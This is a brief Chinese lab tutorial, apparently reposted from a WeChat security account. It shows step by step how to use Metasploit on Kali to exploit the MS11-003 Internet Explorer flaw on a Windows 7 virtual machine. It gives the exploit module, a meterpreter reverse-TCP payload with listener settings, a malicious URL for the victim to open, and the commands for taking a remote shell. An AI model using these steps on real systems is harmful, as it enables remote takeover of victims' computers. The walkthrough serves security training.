windows7IE溢出攻击
工具metasploit
靶机两台windows 7和kali2020
攻击机IP地址10.20.29.129
被攻击机IP地址10.20.29.134
步骤
1、在kali里面打开metasploit漏洞利用框架
2、搜索ms11-003漏洞利用模块
3、使用利用模块use exploit/windows/browser/ms11_003_ie_css_import
4、设置payload set payload windows/meterpreter/reverse_tcp
5、查看options
6、配置options信息SRVHOST、LHOST均为Kali IP、URIPATH;任意数
set srvhost 10.20.29.129 set lhost 10.20.29.129 set uripath 8
7、开始攻击 run/exploite会生成一个URL&复制链接使用Windows7 IE浏览器访问
8、打开windows 7 并进行访问
9、这时kali虚拟机出现这种情况说明连接成功
10、查看session会话
11、sessions -i 1 连接windows7
选择sessions会话的时候可能会连接不成功那么换一个sessions即可
12、获取shell并输入ipconfig
原文始发于微信公众号(黑客技术家园):kail利用msf工具对漏洞入侵渗透Win7仅供测试使用
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论